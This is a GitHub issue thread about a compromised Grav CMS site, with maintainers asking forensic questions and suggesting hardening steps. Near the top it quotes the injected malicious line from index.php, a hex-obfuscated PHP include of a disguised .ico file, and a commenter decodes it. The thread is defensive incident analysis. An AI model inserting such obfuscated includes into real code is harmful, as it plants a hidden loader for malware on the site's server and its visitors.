### ISSUE TITLE
Major security issues

### ISSUE THREAD

**Issue by heihachi88** [getgrav/grav#1985]
Today i've noticed, that someone hijacked my Grav site on a VPS (none of other sites was affected, just Grav). I found they've added this code to my root index.php:

```
/*07cd0*/

@include "\x2fs\x72v\x2fw\x77w\x2fs\x65r\x6be\x6fr\x67/\x2fn\x6fd\x65_\x6do\x64u\x6ce\x73/\x70a\x74h\x2dr\x6fo\x74-\x72e\x67e\x78/\x66a\x76i\x63o\x6e_\x63e\x615\x656\x2ei\x63o";

/*07cd0*/
```

How is that possible? I've set correct permissions on files and dirs. Admin plugin has its flaws?

**Comment by mahagr** [comment]
@heihachi88 Could you please email me (matias@trilby.media, CC andy@trilby.media) with zipped folder of your site?

**Comment by heihachi88** [comment]
ok, will do it today

**Comment by mahagr** [comment]
Did you remove the offending line already? Where it was? Did you do anything else to the site?

**Comment by dimitrilongo** [comment]
For investigation purpose
decoded : `@include "/srv/www/serkeorg//node_modules/path-root-regex/favicon_cea5e6.ico";` maybe a malware

**Comment by mahagr** [comment]
yea, I just cannot find that file in the zip. Can you find it?

**Comment by heihachi88** [comment]
I removed it manually already, the question is how is that possible?

**Comment by heihachi88** [comment]
how to check whole node_modules dir?

**Comment by rhukster** [comment]
Does that directory that is reference exist on your server? is that under your Grav directory or some other place?

**Comment by heihachi88** [comment]
Its `node_modules` dir, because i've already deleted all malicious injections from my files with a help of git status.

**Comment by w00fz** [comment]
Do you have server logs (Apache/php) ?

**Comment by rhukster** [comment]
But where did `node_modules` directory come from? what was the list of packages installed there? 

Here's the thing, simply having a line in a Grav `index.php` file that has some malware loaded doesn't tell us much.  It doesn't even mean that Grav was used to install that vulnerability.  Grav is just a bunch of files, so if someone gains access to your server, it can edit any file, including one of Gravs.  As this vunlerability seems to rely on a file in a `node_modules` folder, which is something Node.js uses, and Grav doesn't actually have any Node.js stuff in it itself, it seems unlikely it's Grav.  But we need to know more about how that malware got there, which might lead us to how that Grav file was modified.

So more questions for you:

* Do you have a backup of this `node_modules` dir before you deleted it?
* Why do you have a `package.json` file a the root of your Grav installation? This is not part of Grav, and this is used by Node.js to install packages in a `node_modules` folder
* Why do you have a `permissions.sh` file in your root?

* Do you have admin

**Comment by heihachi88** [comment]
`node_modules` came from package.json that i've created, it has the following lines:

```
  "devDependencies": {
    "gulp": "^3.9.1",
    "gulp-clean-css": "^3.9.3",
    "gulp-concat": "^2.6.1",
    "gulp-rename": "^1.2.2",
    "gulp-sass": "^3.1.0",
    "gulp-uglify": "^3.0.0"
  },
  "dependencies": {
    "@fortawesome/fontawesome-free-webfonts": "^1.0.4",
    "bootstrap": "^4.0.0"
  }
```

Nothing unusual, just some packages for frontend. Answering on your questions:

- unfortunately i didn't backup it;
- Where it supposed to be then? My own theme's dir? I just installed all packages in the root of my site;
- I just uploaded it before that thing happened to me;
- I have admin panel, if you mean that.

So can a node package make changes to my files, is that possible at all?

**Comment by rhukster** [comment]
Well,  you shouldn't really ever be doing this kind of development on a live server.  You should be doing these kinds of development tasks on your local machine, and only pushing the 'production' CSS and JS to your production server.  (https://getgrav.org/blog/development-strategy)

So:

1. You should do these kinds of CSS/JS development on your local development environment, not production
2. These files node/gulp etc, should be in the theme, and should NOT be something you push to production

This malware vector is reliant on an `ico` file in a `path-root-regex` JS package. This is a real package, but was it installed? is it compromised?  So many unknowns, and we can't really know without seeing the files (which you have deleted).

It's strange that this malware is reliant on something that's not standard in Grav, something that is based on non-standard folders, that you have installed. It seems more a vulnerability coming from that, than from Grav.  

We really can't do much more until we seem some logs of that show anything useful, because right now, there are no clues to indicate that anything was compromised in Grav other than the default file modified, but any malware would look for that file and install things there.  So again, not really anything Grav-specific here.

**Comment by OleVik** [comment]
I've seen this before, and in just about every case it is a result of FTP, SFTP or SSH credentials hijacked or sniffed from insufficiently secure connections. It affecting Grav is not unique, as Grav utilizes a index.php in its root folder. The common employment of this vector is to inject strings into index.php, .htaccess, or other common files.

Apart from not developing on a live server, scrubbing the node_modules directory is entirely safe as any valid scripts relying on them currently can be rebuilt with a simple `npm install` on that package.json. @heihachi88, could you please also provide details filling out the [report template here](https://learn.getgrav.org/security/overview#submitting-a-report)? Especially Grav version and installed extensions, the environment details such as server (Ubuntu, Debian, etc), webserver (Apache,  Ngxinx, Caddy, etc), and technologies other than the already listed PHP (for Grav) and Node (used for the other site).

From what I can tell, this has little to do with `path-root-regex`, and more to do with an automated execution relying on an obscure file in an obscure location. The last time I fixed an issue like this, the most evident trace of activity was revealed in Apache's logs, as an increase in automated attempts to access files that were non-standard to the related software - including Grav, WordPress, and various BB-like forums.

The patch, if I may suggest a solution based on prior experience and intuition, is to immediately revoke all FTP-accounts, SSH-accounts, and any other system-level access-credentials that have been issued. Even if you are the only person you know to have access to the server, you need to lock it down in order to secure further connections. Especially FTP is prone to this, as getting credentials is comparatively easy, but also SFTP and SSH as mentioned above. Generally, for a production server, you always use an unique (one per account and site) private/public key-pair with access token, and take care to replace this frequently.

**Comment by rhukster** [comment]
Good points Ole,  just to be safe on the Grav side too, use a non-standard admin path (configurable in admin plugin configuration), non-standard admin account (not admin), and new password, as well as potentially enabling 2FA.

**Comment by heihachi88** [comment]
@OleVik i am not using a password for ssh logins, just the key, i completely disabled logins via passwords long ago, that's why i'm curious, how's that even possible, i thought maybe it's a flaw in a Grav Admin plugin' form.

**Comment by heihachi88** [comment]
i'll create separate access log for this website and will track this

**Comment by OleVik** [comment]
It would also, as I mentioned above, be helpful if you could expand upon the hosting environment:

> Especially Grav version and installed extensions, the environment details such as server (Ubuntu, Debian, etc), webserver (Apache, Ngxinx, Caddy, etc), and technologies other than the already listed PHP (for Grav) and Node (used for the other site).

**Comment by heihachi88** [comment]
Nothing happened yet, since i wiped whole site and cloned clean one from my repo, i just changed admin password to a very difficult one, like `DsfXHJLgW4KGeDpGNiRagnFf`. I guess they brute-forced admin form, or it has flaws.

My hosting environment is pretty simple:

1. Nginx 1.10
2. php-fpm 7.2

nothing more is installed here, nobody has access to it, except myself, password authentication is turned off, using key to auth, not using FTP (server) on all of my VPS since 2012 year.

**Comment by OleVik** [comment]
@heihachi88 Any more activity since the 22nd? The Login plugin can prevent brute-force attacks, see [Rate Limiting](https://learn.getgrav.org/admin-panel/security/rate-limiting).

**Comment by h3artbl33d** [comment]
Moreover, if you would like further assist, consider the following details relevant:

- What OS and software are you running, how are updates handled? Just stating `nginx `1.10` doesn't help; that version stems from Q2 2016. Likely there is a subversion and perhaps backported security patches, supplied by your OS vendor.
- Do you have relevant logs, going back before the malicious file was placed?
- How are publicly exposed services configured? Most importantly, the webserver, php, etc. Setting ACLs says nothing if the server hosts dozens of websites, outdated and vulnerable, all running under the `nginx` user.
- How did you configure Grav before it was hacked? You stated that you've changed the password to a very difficult one AFTER the hack, for all we know it was `abc123` before that. Moreover, did you move the admin directory, enabled 2FA, etc? And did you use the nginx configuration that is supplied by Grav?
- Certain things would be handy to tell beforehand, like running a development stack on a production webserver.

Personally, I would take drastic measures if a website or webserver was hacked; completely reinstalling the box and walking through the configuration to set everything as secure as possible.

**Comment by h3artbl33d** [comment]
It doesn't. These two lines merely -try- to disable error logging from PHP. The `ini_set` _should_ be listed in the `disabled_function` directive in php.ini - especially when there is just one user to manage these websites.

Even if that is not the case, `ini_set` is unable to change the values of Nginx' logging facilities, like the access log, the error log (by Nginx) and other logging facilities that might be in place.

**Comment by mahagr** [comment]
@h3artbl33d Unfortunately `ini_set()` is kind of required to make Grav (or any other CMS) work properly with all the server settings.

**Comment by h3artbl33d** [comment]
Though I completely respect your opinion, I have to disagree. `ini_set` is merely a hack to change values set in `php.ini`.

If a server runs several websites, each with a different CMS, it doesn't matter that much. All those PHP functions combined post no greater or lesser (security) risk than allowing `ini_set`.

There are methods that mitigate this risk, like chrooting/jailing/caging, every website runs under its own user with its own PHP instance, etc. But few are willing to go through that effort - myself included. Even though I find that attitude lacking to best effort, I do understand that.

Back on topic, @heihachi88, are you willing to investigate as how this server was infected?

**Comment by nithinkolekar** [comment]
I thought it was [just me]((https://twitter.com/Enhance_Talent/status/980005859072847874)) and ignored assuming it was mis-configuration in hosting environment until I found this thread which sounds exactly problem i.e. malicious code injected to load favicon_cea5e6.ico 

Additionally new index.php were found in user/pages/ and bin/ with malicious code mentioned by OP.

As a workaround I created empty index.php with permission set to root so that it won't be modified nor created. ( Too hackish. I know)

**Comment by rhukster** [comment]
Do you have logs showing how that file was modified?

**Comment by nithinkolekar** [comment]
I have VPS(reputed) and taken the backup of logs of last 2 months.
But I don't find any suspicious url where that file get created.

Log with changing actual domain name and username. [grav-log-MayJune2018.zip](https://github.com/getgrav/grav/files/2140321/grav-log-MayJune2018.zip)

Permissions were set as per the official guidelines.
